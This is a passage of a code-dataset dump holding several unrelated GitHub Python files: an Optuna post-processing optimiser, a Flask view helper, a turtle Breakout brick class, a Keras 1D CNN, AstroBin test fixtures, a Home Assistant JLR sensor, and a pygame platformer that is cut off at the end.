= load_model_from_save_dir(save_dir, best_weights)\n modified = False\n if nomenclature.projections is None:\n logger.info('building nomenclature projections')\n nomenclature.build_nomenclature_projections(\n lambda x : model.run_model_single_side(\n [np.array([emb], dtype=np.float32) for emb in data_formatter.format_input(x)])[0])\n modified = True\n if nomenclature.ngram_hot_encodings is None:\n nomenclature.create_trigram_repr()\n modified = True\n if modified:\n data_formatter.save(os.path.join(save_dir, \"batcher\"))\n if sync_with_minio:\n logger.info('pushing to minio')\n push_to_minio(save_dir)\n except Exception as e:\n logger.error(f'Error loading objects : {e}')\n exit(-1)\n\n # loading test data\n logger.info('Loading list of test BIs')\n try:\n test_cabbis_df = pd.read_csv(os.path.join(save_dir, 'cabbi_test.csv'))\n except Exception as e:\n logger.error(f'Error loading list of test BIs : {e}')\n exit(-1)\n \n # split in train/test\n cabbi_optim, cabbi_test = train_test_split(test_cabbis_df, test_size=0.5)\n cabbi_optim.to_csv(os.path.join(save_dir, 'optim_train_cabbis.csv'))\n cabbi_test.to_csv(os.path.join(save_dir, 'optim_test_cabbis.csv'))\n \n def get_sql_request(config, cabbis_df):\n sql_request = config['data']['postgres_sql']\n cabbi_field = [t for t in sql_request.split(' ') if 'cabbi' in t][0].strip(',. ')\n list_of_cabbi = \"('\" + \"','\".join([str(v) for v in cabbis_df[\"cabbi\"].values]) + \"')\"\n if 'where' in sql_request.lower():\n sql_request += ' AND '\n else:\n sql_request += ' WHERE '\n sql_request += f'{cabbi_field} IN {list_of_cabbi}'\n return sql_request\n \n # run optimizer\n optim_savedir = os.path.join(save_dir,'postprocess_optim')\n os.makedirs(optim_savedir, exist_ok=True)\n \n def objective(trial: Trial):\n \"\"\"\n définit ce qui est fait pendant une passe:\n - génération de valeurs\n - calcul des top-k\n - sauvegarde du tout\n \"\"\"\n if 'post_process' not in config:\n config['post_process'] = {}\n config['post_process']['alpha_tree_mod'] = trial.suggest_uniform(\"alpha_tree\", 0, 1)\n config['post_process']['beta_str_sim_mod'] = trial.suggest_uniform(\"beta_str_sim\", 0, 1)\n \n sql_request = get_sql_request(config, cabbi_optim)\n bdd = PostGre_SQL_DB()\n batch_size = config['trainings']['training_params']['batch_size']\n input_df = bdd.read_from_sql_with_chunksize(sql_request, batch_size)\n nb_docs = len(cabbi_optim[\"cabbi\"].values)\n \n logger.info(f\"Calculating top-k for alpha={config['post_process']['alpha_tree_mod']}, beta={config['post_process']['beta_str_sim_mod']}\")\n global_results, _ = run_top_k_on_test(config, input_df, nb_docs,\n data_cleaner, data_formatter, model,\n to_csv_file=os.path.join(optim_savedir, f'test_results_{trial.number}.csv'))\n logger.info(f'Results: {global_results}')\n global_results['saved_model'] = best_weights\n global_results['alpha_tree_mod'] = config['post_process']['alpha_tree_mod']\n global_results['beta_str_sim_mod'] = config['post_process']['beta_str_sim_mod']\n with open(os.path.join(optim_savedir, f'top_k_{trial.number}.json'), 'w') as f:\n json.dump(global_results, f)\n \n top_x_to_optimize = config['post_process']['top_X_to_optimize']\n trial.report(global_results['top_k_perc'][top_x_to_optimize], step=1)\n return global_results['top_k_perc'][top_x_to_optimize]\n \n #création du l'\"étude\" optuna\n study_name = 'postprocess_optim'\n maximum_time = config['post_process']['optim_timeout_in_min'] * 60 # seconds\n number_of_trials = config['post_process']['nb_trials']\n \n optuna.logging.enable_propagation()\n optuna.logging.disable_default_handler()\n study = optuna.create_study(study_name=study_name, direction='maximize')\n try:\n study.optimize(objective, n_trials=number_of_trials, timeout=maximum_time)\n except Exception as e:\n logger.error(e)\n exit(-1)\n \n # récupératio du résultat et modification de config\n df = study.trials_dataframe()\n df.to_json(os.path.join(optim_savedir, 'optimisation_results.json'))\n best_trial = study.best_trial\n if 'post_process' not in config:\n config['post_process'] = {}\n config['post_process']['alpha_tree_mod'] = best_trial.params[\"alpha_tree\"]\n config['post_process']['beta_str_sim_mod'] = best_trial.params[\"beta_str_sim\"]\n save_config(config, save_dir)\n shutil.copy(os.path.join(optim_savedir, f'test_results_{best_trial.number}.csv'), \n os.path.join(save_dir, 'optim_train_results.csv'))\n \n \n # get final perfs\n sql_request = get_sql_request(config, cabbi_test)\n bdd = PostGre_SQL_DB()\n batch_size = config['trainings']['training_params']['batch_size']\n input_df = bdd.read_from_sql_with_chunksize(sql_request, batch_size)\n nb_docs = len(cabbi_test[\"cabbi\"].values)\n\n logger.info(f'Calculating optimized top-k')\n global_results, _ = run_top_k_on_test(config, input_df, nb_docs,\n data_cleaner, data_formatter, model,\n to_csv_file=os.path.join(save_dir, 'optim_test_results.csv'))\n logger.info(f'Results: {global_results}')\n global_results['saved_model'] = best_weights\n global_results['alpha_tree_mod'] = config['post_process']['alpha_tree_mod']\n global_results['beta_str_sim_mod'] = config['post_process']['beta_str_sim_mod']\n with open(os.path.join(save_dir, f'optim_top_k.json'), 'w') as f:\n json.dump(global_results, f)\n\n # push on minio\n if sync_with_minio:\n push_to_minio(save_dir)","repo_name":"etalab-ia/ami-ia-insee-aiee2","sub_path":"nomenclatures/script_optimize_postprocess.py","file_name":"script_optimize_postprocess.py","file_ext":"py","file_size_in_byte":10454,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"5628117108","text":"from flask import views,request,make_response,json\n\n\ndef _jsonify(data):\n data = json.dumps(data)\n response = make_response(data)\n response.headers['Content-Type'] = 'application/json'\n response.headers['Content-Length'] = len(data)\n return response\n\nclass PostView(views.MethodView):\n def _process_post(self):\n self.data = ((request.data and json.loads(request.data)) if not request.form else dict(request.form.items())) if not request.mimetype == 'application/json' else request.json\n","repo_name":"jstacoder/flask-tasks","sub_path":"flask_tasks/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":511,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"12276710176","text":"from turtle import Turtle\n\n\nclass Brick:\n margin = 20\n margin = 20\n bricks_widthpx = 45\n bricks_heightpx = 30\n bricks_heightgap = 100\n\n def __init__(self, screen_width, screen_height):\n self.bricks = []\n self.bricks_width = 2\n self.bricks_height = 1\n self.name = \"brick\"\n self.screen_width = screen_width\n self.screen_height = screen_height\n\n self.screen_width = 480\n self.screen_height = 500\n\n def create_brick(self, pos_x, pos_y, color):\n brick = Turtle(shape=\"square\")\n brick.shapesize(self.bricks_height, self.bricks_width)\n brick.color(color)\n brick.penup()\n brick.goto(pos_x, pos_y)\n brick.pendown()\n return brick\n\n def create_bricks(self):\n top_x = -1 * int(self.screen_width / 2) + self.margin + 10\n top_y = int(self.screen_height / 2) - self.margin - self.bricks_heightgap\n\n brick_color = [\"red\", \"orange\", \"green\", \"yellow\"]\n for j in range(4):\n for i in range(int(self.screen_width / self.bricks_widthpx)):\n brick = self.create_brick( i*self.bricks_widthpx + top_x, -j*self.bricks_heightpx + top_y, brick_color[j])\n self.bricks.append(brick)\n\n def hidebrick(self, brick):\n brick.penup()\n brick.goto(99999, 99999)\n brick.pendown()","repo_name":"distareza/Python_BreakoutGame","sub_path":"Brick.py","file_name":"Brick.py","file_ext":"py","file_size_in_byte":1362,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"14105356035","text":"from keras import Sequential\nfrom keras.layers import Dense, Convolution1D, Dropout, Flatten, BatchNormalization\n\nfrom models import BasicModel\nfrom reprocess import reshape_1d_feature_for_1d_cnn\nfrom stock_reader import SequenceReader\nfrom util import bias_mean_abs_error\n\n\nclass Cnn1DSingleChannelModel(BasicModel):\n\n def _create_reader(self):\n return SequenceReader(\n self.data_path, self.index_file, self.sequence_length)\n\n def __init__(self, *args, **kwargs):\n super().__init__(*args, **kwargs)\n self.loss = bias_mean_abs_error\n self.kernel_size = 4\n\n def _reshape_input(self, raw_features):\n shape, feature = reshape_1d_feature_for_1d_cnn(raw_features)\n self.input_shape = shape\n return feature\n\n def _create(self):\n\n if self.input_shape is None:\n raise ValueError(\"input_shape is not set\")\n\n model = Sequential()\n\n model.add(Convolution1D(filters=64, kernel_size=self.kernel_size,\n padding=\"same\", activation=\"relu\",\n # kernel_regularizer=\"l1\",\n input_shape=self.input_shape))\n model.add(BatchNormalization())\n # model.add(Dropout(0.5))\n\n model.add(Convolution1D(filters=32, kernel_size=self.kernel_size,\n # kernel_regularizer=\"l1\",\n padding=\"same\", activation=\"relu\"))\n model.add(BatchNormalization())\n # model.add(MaxPooling1D())\n # model.add(Dropout(0.5))\n\n model.add(Convolution1D(filters=16, kernel_size=self.kernel_size,\n # kernel_regularizer=\"l1\",\n padding=\"same\", activation=\"relu\"))\n model.add(BatchNormalization())\n # model.add(MaxPooling1D())\n model.add(Dropout(0.4))\n\n model.add(Flatten())\n\n # model.add(Dense(512, activation='relu'))\n # model.add(Dropout(0.5))\n model.add(Dense(512, activation='relu'))\n model.add(BatchNormalization())\n # model.add(Dropout(0.5))\n\n # model.add(Dense(1, activation='linear'))\n model.add(Dense(1, activation='sigmoid'))\n\n # opt = SGD(lr=0.05, momentum=0.0, decay=0.0, nesterov=False)\n\n return model\n","repo_name":"i404/SaltedFish","sub_path":"salted_fish/models/cnn_1d_single_channel_model.py","file_name":"cnn_1d_single_channel_model.py","file_ext":"py","file_size_in_byte":2311,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"35386333475","text":"# Python\nimport json\n\n# Django\nfrom django.contrib.auth.models import User, Group\nfrom django.core.urlresolvers import reverse\nfrom django.db.models import Max\n\n# Third party apps\nfrom subscription.models import Subscription, UserSubscription\n\n# This app\nfrom rawdata.utils import md5_for_file\n\n\n# Utility functions\ndef max_id(Klass):\n new_id = Klass.objects.aggregate(Max('id'))['id__max']\n if new_id is None:\n new_id = 1\n return new_id\n\n\ndef setup_data(testcase):\n # Groups\n Group.objects.create(name = \"Producers\")\n Group.objects.create(name = \"Retailers\")\n Group.objects.create(name = \"Paying\")\n\n Group.objects.create(name = \"affiliate-1\")\n Group.objects.create(name = \"affiliate-10\")\n Group.objects.create(name = \"affiliate-50\")\n Group.objects.create(name = \"affiliate-100\")\n Group.objects.create(name = \"affiliate-inf\")\n Group.objects.create(name = \"retailer-affiliate-1\")\n Group.objects.create(name = \"retailer-affiliate-10\")\n Group.objects.create(name = \"retailer-affiliate-50\")\n Group.objects.create(name = \"retailer-affiliate-100\")\n Group.objects.create(name = \"retailer-affiliate-inf\")\n\n Group.objects.create(name = \"everyone\")\n\n rawdata_atom_group = Group.objects.create(name = \"rawdata-atom\")\n rawdata_meteor_group = Group.objects.create(name = \"rawdata-meteor\")\n rawdata_luna_group = Group.objects.create(name = \"rawdata-luna\")\n rawdata_sol_group = Group.objects.create(name = \"rawdata-sol\")\n rawdata_galaxia_group = Group.objects.create(name = \"rawdata-galaxia\")\n\n donor_coffee_monthly_group = Group.objects.create(name = \"astrobin-donor-coffee-monthly\")\n donor_snack_monthly_group = Group.objects.create(name = \"astrobin-donor-snack-monthly\")\n donor_pizza_monthly_group = Group.objects.create(name = \"astrobin-donor-pizza-monthly\")\n donor_movie_monthly_group = Group.objects.create(name = \"astrobin-donor-movie-monthly\")\n donor_dinner_monthly_group = Group.objects.create(name = \"astrobin-donor-dinner-monthly\")\n\n donor_coffee_yearly_group = Group.objects.create(name = \"astrobin-donor-coffee-yearly\")\n donor_snack_yearly_group = Group.objects.create(name = \"astrobin-donor-snack-yearly\")\n donor_pizza_yearly_group = Group.objects.create(name = \"astrobin-donor-pizza-yearly\")\n donor_movie_yearly_group = Group.objects.create(name = \"astrobin-donor-movie-yearly\")\n donor_dinner_yearly_group = Group.objects.create(name = \"astrobin-donor-dinner-yearly\")\n\n Group.objects.create(name = \"IOTD_Staff\")\n\n # Subscriptions\n Subscription.objects.create(name = \"Atom\", description = \"512 MB\", price = 0, recurrence_period = 100, recurrence_unit = \"Y\", group = rawdata_atom_group, trial_period = 0, trial_unit = \"D\")\n Subscription.objects.create(name = \"Meteor\", description = \"5 GB\", price = 2.95, recurrence_period = 1, recurrence_unit = \"M\", group = rawdata_meteor_group, trial_period = 7, trial_unit = \"D\")\n Subscription.objects.create(name = \"Luna\", description = \"100 GB\", price = 9.95, recurrence_period = 1, recurrence_unit = \"M\", group = rawdata_luna_group, trial_period = 7, trial_unit = \"D\")\n Subscription.objects.create(name = \"Sol\", description = \"250 GB\", price = 19.95, recurrence_period = 1, recurrence_unit = \"M\", group = rawdata_sol_group, trial_period = 7, trial_unit = \"D\")\n Subscription.objects.create(name = \"Galaxia\", description = \"500 GB\", price = 49.95, recurrence_period = 1, recurrence_unit = \"M\", group = rawdata_galaxia_group, trial_period = 7, trial_unit = \"D\")\n\n Subscription.objects.create(name = \"AstroBin Donor Coffee Monthly\", description = \"\", price = 2.50, recurrence_period = 1, recurrence_unit = \"M\", group = donor_coffee_monthly_group, trial_period = 0, trial_unit = \"D\")\n Subscription.objects.create(name = \"AstroBin Donor Snack Monthly\", description = \"\", price = 3.50, recurrence_period = 1, recurrence_unit = \"M\", group = donor_snack_monthly_group, trial_period = 0, trial_unit = \"D\")\n Subscription.objects.create(name = \"AstroBin Donor Pizza Monthly\", description = \"\", price = 6.00, recurrence_period = 1, recurrence_unit = \"M\", group = donor_pizza_monthly_group, trial_period = 0, trial_unit = \"D\")\n Subscription.objects.create(name = \"AstroBin Donor Movie Monthly\", description = \"\", price = 10.00, recurrence_period = 1, recurrence_unit = \"M\", group = donor_movie_monthly_group, trial_period = 0, trial_unit = \"D\")\n Subscription.objects.create(name = \"AstroBin Donor Dinner Monthly\", description = \"\", price = 25.00, recurrence_period = 1, recurrence_unit = \"M\", group = donor_dinner_monthly_group, trial_period = 0, trial_unit = \"D\")\n\n Subscription.objects.create(name = \"AstroBin Donor Coffee Yearly\", description = \"\", price = 24.00, recurrence_period = 1, recurrence_unit = \"Y\", group = donor_coffee_yearly_group, trial_period = 0, trial_unit = \"D\")\n Subscription.objects.create(name = \"AstroBin Donor Snack Yearly\", description = \"\", price = 34.00, recurrence_period = 1, recurrence_unit = \"Y\", group = donor_snack_yearly_group, trial_period = 0, trial_unit = \"D\")\n Subscription.objects.create(name = \"AstroBin Donor Pizza Yearly\", description = \"\", price = 60.00, recurrence_period = 1, recurrence_unit = \"Y\", group = donor_pizza_yearly_group, trial_period = 0, trial_unit = \"D\")\n Subscription.objects.create(name = \"AstroBin Donor Movie Yearly\", description = \"\", price = 100.00, recurrence_period = 1, recurrence_unit = \"Y\", group = donor_movie_yearly_group, trial_period = 0, trial_unit = \"D\")\n Subscription.objects.create(name = \"AstroBin Donor Dinner Yearly\", description = \"\", price = 250.00, recurrence_period = 1, recurrence_unit = \"Y\", group = donor_dinner_yearly_group, trial_period = 0, trial_unit = \"D\")\n\n\n testcase.unsubscribed_user = User.objects.create_user('username_unsub', 'fake0@email.tld', 'passw0rd')\n testcase.subscribed_user = User.objects.create_user('username_sub', 'fake1@email.tld', 'passw0rd')\n testcase.subscribed_user_2 = User.objects.create_user('username_sub_2', 'fake2@email.tld', 'passw0rd')\n testcase.subscribed_user_3 = User.objects.create_user('username_sub_3', 'fake3@email.tld', 'passw0rd')\n\n testcase.group = Group.objects.create(name = 'rawdata-test')\n testcase.group.user_set.add(testcase.subscribed_user, testcase.subscribed_user_2)\n\n testcase.group_empty = Group.objects.create(name = 'rawdata-empty')\n testcase.group_empty.user_set.add(testcase.subscribed_user_3)\n\n testcase.subscription = Subscription.objects.create(\n name = 'test_subscription',\n price = 1.0,\n group = testcase.group)\n testcase.subscription_empty = Subscription.objects.create(\n name = 'test_subscription_empty',\n price = 1.0,\n group = testcase.group_empty)\n\n testcase.user_subscription = UserSubscription.objects.create(\n user = testcase.subscribed_user,\n subscription = testcase.subscription,\n cancelled = False)\n\n testcase.user_subscription_2 = UserSubscription.objects.create(\n user = testcase.subscribed_user_2,\n subscription = testcase.subscription,\n cancelled = False)\n testcase.user_subscription_3 = UserSubscription.objects.create(\n user = testcase.subscribed_user_3,\n subscription = testcase.subscription_empty,\n cancelled = False)\n\n\ndef teardown_data(testcase):\n testcase.subscribed_user.delete()\n testcase.unsubscribed_user.delete()\n testcase.group.delete()\n testcase.subscription.delete()\n testcase.user_subscription.delete()\n\n\ndef get_file():\n f = open('rawdata/fixtures/test.fit', 'rb')\n h = md5_for_file(f)\n\n f.seek(0)\n return f, h\n\n\ndef get_unsupported_file():\n f = open('rawdata/fixtures/test.png', 'rb')\n h = md5_for_file(f)\n\n f.seek(0)\n return f, h\n\n\ndef test_response(testcase, url, data, expected_status_code = 200,\n expected_field = None, expected_message = None):\n response = testcase.client.post(url, data)\n response_json = json.loads(response.content)\n testcase.assertEquals(response.status_code, expected_status_code)\n if expected_field:\n testcase.assertEquals(\n response_json[expected_field][0],\n expected_message)\n\n return response_json\n\ndef upload_file(testcase):\n f, h = get_file()\n testcase.client.login(username = 'username_sub', password = 'passw0rd')\n response = test_response(\n testcase,\n reverse('api.rawdata.rawimage.list'),\n {'file': f, 'file_hash': h},\n 201)\n testcase.client.logout()\n return response['id']\n\ndef upload_unsupported_file(testcase):\n f, h = get_unsupported_file()\n testcase.client.login(username = 'username_sub', password = 'passw0rd')\n response = test_response(\n testcase,\n reverse('api.rawdata.rawimage.list'),\n {'file': f, 'file_hash': h},\n 201)\n testcase.client.logout()\n return response['id']\n","repo_name":"daPhantom/astrobin","sub_path":"rawdata/tests/common.py","file_name":"common.py","file_ext":"py","file_size_in_byte":8915,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"12937196716","text":"\"\"\"Add Support for JLR Incontrol Binary Sensors.\"\"\"\nimport logging\n\nfrom homeassistant.components.binary_sensor import BinarySensorDevice\n\nfrom . import RESOURCES, JLREntity\n\n_LOGGER = logging.getLogger(__name__)\n\n\ndef setup_platform(hass, config, add_devices, discovery_info=None):\n \"\"\"Set up the JLR Binary sensors.\"\"\"\n if discovery_info is None:\n return\n add_devices([JLRSensor(hass, *discovery_info)])\n\n\nclass JLRSensor(JLREntity, BinarySensorDevice):\n \"\"\"Representation of a JLR sensor.\"\"\"\n\n @property\n def is_on(self):\n \"\"\"Return true if the binary sensor is on.\"\"\"\n val = self.get_updated_info()\n if val is None:\n return val\n\n if val:\n val = val[self._attribute]\n else:\n return None\n\n if self._attribute in [\n \"DOOR_IS_ALL_DOORS_LOCKED\",\n \"IS_SUNROOF_OPEN\"\n ]:\n return bool(val == \"FALSE\")\n\n return val\n\n @property\n def device_class(self):\n \"\"\"Return the class of this sensor.\"\"\"\n return RESOURCES[self._attribute][3]\n\n @property\n def icon(self):\n \"\"\"Return the icon.\"\"\"\n return RESOURCES[self._attribute][2]\n","repo_name":"MZorzy/JLR_InControl","sub_path":"custom_components/jlrincontrol/binary_sensor.py","file_name":"binary_sensor.py","file_ext":"py","file_size_in_byte":1203,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"12875574119","text":"import pygame\r\n\r\nimport sys\r\n\r\nsys.path.append('levels')\r\n\r\nfrom levels import *\r\n\r\n \r\npygame.init()\r\npygame.display.set_caption('Дровосек 2')\r\nfrom Player import Player\r\nfrom platforms import Platform\r\n\r\n\r\n#SOUND\r\n\r\n\r\nSIZE = [700, 600]\r\n#Window create\r\nwindow = pygame.display.set_mode(SIZE)\r\n#game win\r\nscreen = pygame.Surface(SIZE)\r\n#SAVEFILE\r\nSAVES = open(\"saves.txt\", 'r' )\r\nfileS = SAVES.readlines()\r\nxS = int(fileS[0])\r\nyS = int(fileS[1])\r\niS = int(fileS[4])\r\nSAVES.close()\r\n\r\nbg = [\"sprites/bg/bg1.png\",\"sprites/bg/bg2.png\"]\r\n\r\n\r\n\r\n# create hero\r\nhero = Player(xS,yS)\r\nleft = right = up =False\r\n\r\n\r\n#Create level\r\nspriteForLVL = [[\r\n'sprites/platform/Tile_31.png',\r\n'sprites/platform/Tile_01.png',\r\n'sprites/platform/Tile_03.png',\r\n'sprites/platform/Tile_02.png',\r\n'sprites/platform/Tile_08.png',\r\n'sprites/platform/Tile_55.png',\r\n'sprites/platform/spike.png',\r\n],\r\n[\r\n'sprites/platform/tile5.png',\r\n'sprites/platform/tile1.png',\r\n'sprites/platform/tile3.png',\r\n'sprites/platform/tile2.png',\r\n'sprites/platform/tile8.png',\r\n'sprites/platform/tile5.png',\r\n'sprites/platform/lava.png',\r\n]]\r\n\r\nsprite_group = pygame.sprite.Group()\r\nplatforms= []\r\n\r\n\r\nx=0.0\r\ny=0\r\ndef CreateLevel(x,y,i):\r\n\twindow.fill((0, 0 , 0))\r\n\tx = 0.0\r\n\ty = 0\r\n\tLenghty = 0\r\n\r\n\tfor row in levels[i]:\r\n\t\tprint(i)\r\n\t\tWidthx = 0\r\n\t\tfor col in row:\r\n\t\t\tif col =='-':\r\n\t\t\t\t\tif levels[i][Lenghty-1][Widthx] != '-' :\r\n\t\t\t\t\t\tif Widthx+1 != len(row) :\r\n\t\t\t\t\t\t\tif (row[Widthx+1] !='-' or row[Widthx+1] =='#') and (row[Widthx-1] !='-' or row[Widthx-1] =='#'):\r\n\t\t\t\t\t\t\t\tblock = Platform(x, y,spriteForLVL[i][0])\r\n\t\t\t\t\t\t\t\tsprite_group.add(block)\r\n\t\t\t\t\t\t\t\tplatforms.append(block)\r\n\t\t\t\t\t\t\telif row[Widthx-1] ==' ' or row[Widthx-1] =='#' or row[Widthx-1] =='$':\r\n\t\t\t\t\t\t\t\tblock = Platform(x, y,spriteForLVL[i][1])\r\n\t\t\t\t\t\t\t\tsprite_group.add(block)\r\n\t\t\t\t\t\t\t\tplatforms.append(block)\r\n\t\t\t\t\t\t\telif row[Widthx+1] ==' ' or row[Widthx+1] =='#' or row[Widthx-1] =='$':\r\n\t\t\t\t\t\t\t\tblock = Platform(x, y,spriteForLVL[i][2])\r\n\t\t\t\t\t\t\t\tsprite_group.add(block)\r\n\t\t\t\t\t\t\t\tplatforms.append(block)\r\n\t\t\t\t\t\t\telse:\r\n\t\t\t\t\t\t\t\tblock = Platform(x, y,spriteForLVL[i][3])\r\n\t\t\t\t\t\t\t\tsprite_group.add(block)\r\n\t\t\t\t\t\t\t\tplatforms.append(block)\r\n\t\t\t\t\telse:\r\n\t\t\t\t\t\tblock = Platform(x, y,spriteForLVL[i][5])\r\n\t\t\t\t\t\tsprite_group.add(block)\r\n\t\t\t\t\t\tplatforms.append(block)\t\t\t\t\t\t\r\n\t\t\telif col =='*':\r\n\t\t\t\t\tglass = Platform(x, y+36,spriteForLVL[i][4])\r\n\t\t\t\t\tsprite_group.add(glass)\r\n\t\t\t\t\tplatforms.append(glass)\r\n\t\t\t\t\tglass.collideV = False\r\n\t\t\telif col =='@':\r\n\t\t\t\tactblock = Platform(x, y,'sprites/platform/act.png')\r\n\t\t\t\tsprite_group.add(actblock)\r\n\t\t\t\tplatforms.append(actblock)\r\n\t\t\t\tactblock.actionB = True\r\n\t\t\telif col =='$':\r\n\t\t\t\tcoin =Platform(x, y,'sprites/platform/coin.png')\r\n\t\t\t\tsprite_group.add(coin)\r\n\t\t\t\tplatforms.append(coin)\r\n\t\t\t\tcoin.isItem = True\r\n\t\t\t\tcoin.isCoin = True\r\n\t\t\t\tcoin.collideV = False\r\n\t\t\telif col =='#':\r\n\t\t\t\tspike =Platform(x, y+16,spriteForLVL[i][6])\r\n\t\t\t\tsprite_group.add(spike)\r\n\t\t\t\tplatforms.append(spike)\r\n\t\t\t\tspike.atack = True\r\n\t\t\telif col == \"H\":\r\n\t\t\t\theart = Platform(x, y,'sprites/platform/hurt.png')\r\n\t\t\t\tsprite_group.add(heart)\r\n\t\t\t\tplatforms.append(heart)\r\n\t\t\t\theart.isHeart = True\r\n\t\t\t\theart.isItem = True\r\n\t\t\t\theart.collideV = False\r\n\t\t\telif col =='S':\r\n\t\t\t\tsave =Platform(x, y,'sprites/platform/save.png')\r\n\t\t\t\tsprite_group.add(save)\r\n\t\t\t\tplatforms.append(save)\r\n\t\t\t\tsave.isSave = True\r\n\t\t\t\tsave.collideV = False\r\n\t\t\t\tsave.isItem = True\r\n\t\t\telif col == \"+\":\r\n\t\t\t\tpoution = Platform(x, y,'sprites/platform/poution.png')\r\n\t\t\t\tsprite_group.add(poution)\r\n\t\t\t\tplatforms.append(poution)\r\n\t\t\t\tpoution.isPoution = True\r\n\t\t\t\tpoution.isItem = True\r\n\t\t\t\tpoution.collideV = False\r\n\t\t\telif col == \"→\":\r\n\t\t\t\tNextLevelBlock = Platform(x, y,'sprites/platform/wood.png')\r\n\t\t\t\tsprite_group.add(NextLevelBlock)\r\n\t\t\t\tplatforms.append(NextLevelBlock)\r\n\t\t\t\tNextLevelBlock.isWin = True\r\n\t\t\t\tNextLevelBlock.collideV = False\r\n\t\t\t\tNextLevelBlock.isItem = True\r\n\t\t\telif col == '=':\r\n\t\t\t\tMBlock = Platform(x, y,'sprites/platform/tile9.png')\r\n\t\t\t\tsprite_group.add(MBlock)\r\n\t\t\t\tplatforms.append(MBlock)\r\n\t\t\t\tMBlock.isMoving = True\r\n\t\t\tx += 40.0\r\n\t\t\tWidthx += 1\r\n\t\tLenghty +=1\r\n\t\ty += 40\r\n\t\tx = 0.0\r\n\r\nCreateLevel(x,y,iS)\r\nsprite_group.add(hero)\r\n\r\n#Camera\r\nclass Camera:\r\n\tdef __init__(self, camera_func, width ,height ):\r\n\t\tself.camera_func = camera_func\r\n\t\tself.state = pygame.Rect(0,0,width,height)\r\n\r\n\tdef apply(self, target):\r\n\t\treturn target.rect.move(self.state.topleft)\r\n\r\n\tdef update(self, target):\r\n\t\tself.state = self.camera_func(self.state, target.rect)\r\n\t\t\r\ndef camera_func(camera, target_rect):\r\n\tl = -target_rect.x + SIZE[0]/2\r\n\tt = -target_rect.y + SIZE[1]/2\r\n\tw,h = camera.width, camera.height\r\n\r\n\tl = min(0,l)\r\n\tl = max(-(camera.width-SIZE[0]), l)\r\n\tt = max(-(camera.height-SIZE[1]), t)\r\n\tt = min(0,t)\r\n\r\n\treturn pygame.Rect(l,t,w,h)\r\ntotal_level_width = len(levels[iS][0])*40\r\ntotal_level_height = len(levels[iS]) *40\r\n\r\ncamera = Camera(camera_func, total_level_width, total_level_height)\r\n# Fonts\r\npygame.font.init()\r\ninfFont = pygame.font.Font(None,32)\r\n\r\nbackground_image=pygame.image.load(bg[iS]).convert()\r\n\r\ndone = True\r\n\r\ntimer = pygame.time.Clock()\r\n\r\nwhile done:\r\n\tfor e in pygame.event.get():\r\n\t\tif e.type ==pygame.QUIT:\r\n\t\t\tdone = False\r\n\r\n\t\t#KEY Option\r\n\t\tif e.type == pygame.KEYDOWN:\r\n\t\t\tif e.key == pygame.K_LEFT:\r\n\t\t\t\tleft = True\r\n\r\n\t\t\tif e.key == pygame.K_RIGHT:\r\n\t\t\t\tright = True\r\n\t\t\tif e.key == pygame.K_UP:\r\n\t\t\t\tup = True\r\n\r\n\t\tif e.type == pygame.KEYUP:\r\n\t\t\tif e.key == pygame.K_LEFT:\r\n\t\t\t\tleft = False\r\n\t\t\tif e.key == pygame.K_RIGHT:\r\n\t\t\t\tright = False\r\n\t\t\tif e.key == pygame.K_UP:\r\n\t\t\t\tup = False\r\n\r\n\t#FILL SCREEN\r\n\tscreen.fill((0, 0 , 0))\r\n\tscreen.blit(background_image, [1-hero.rect.x*0.1,0])\r\n\t#ADD HERO\r\n\thero.update(left, right,up, platforms)\r\n\tcamera.update(hero)\r\n\tfor e in sprite_group:\r\n\t\tscreen.blit(e.image, camera.apply(e))\r\n\t\t\r\n\t#sprite_group.draw(screen)\r\n\tscreen.blit(infFont.render(u\"Life: %s\" % hero.life,1,(200,200,200)), (SIZE[0]-90,20 ))\r\n\tscreen.blit(infFont.render(u\"Coin: %s\" % hero.coin,1,(200,200,200)), (SIZE[0]-90,SIZE[1]-50 ))\r\n\r\n\tpygame.draw.rect(screen, hero.BarColor, (20, 20, hero.hp,20))\r\n\tif hero.hp <0 and hero.life <=0:\r\n\t\tdone = False\r\n\tif hero.hp < 0:\r\n\t\tSAVES = open(\"saves.txt\", 'r' )\r\n\t\tfileS = SAVES.readlines()\r\n\t\txS = int(fileS[0])\r\n\t\tyS = int(fileS[1])\r\n\t\tiS = int(fileS[4])\r\n\t\tSAVES.close()\r\n\t\thero.life -= 1\r\n\t\thero.rect.x = xS\r\n\t\thero.rect.y = yS\r\n\t\thero.hp = 100\r\n\tif hero.nextLVL == True:\r\n\t\tSAVES = open(\"saves.txt\", 'r' )\r\n\t\tfileS = SAVES.readlines()\r\n\t\t\r\n\t\t\r\n\t\tiS = int(fileS[4])\r\n\t\tSAVES.close()\r\n\t\tfor e in sprite_group:\r\n\t\t\te.kill()\r\n\t\t\r\n\t\tSAVES1 = open(\"saves.txt\", 'w' )\r\n\t\tSAVES1.write(str(56)+ '\\n' + str(56) + '\\n' + str(hero.coin) + '\\n' + str(hero.life) +'\\n' +str(hero.iS))\r\n\t\tSAVES1.close()\r\n\t\tplatforms= []\r\n\t\thero.rect.x = 56\r\n\t\thero.rect.y = 56\r\n\t\tbackground_image=pygame.image.load(bg[iS]).convert()\r\n\t\tCreateLevel(x,y,iS)\r\n\t\tsprite_group.add(hero)\r\n\r\n\t\ttotal_level_width = len(levels[iS][0])*40\r\n\t\ttotal_level_height = len(levels[iS]) *40\r\n\t\tcamera = Camera(camera_func, total_level_width, total_level_height)\r\n\t\tfor e in sprite_group:\r\n\t\t\tscreen.blit(e.image, camera.apply(e))\r\n\r\n\t\thero.nextLVL = False\r\n\r\n\t\t\r\n\r\n\t\r\n\t#Display\r\n\twindow.blit(screen ,(0, 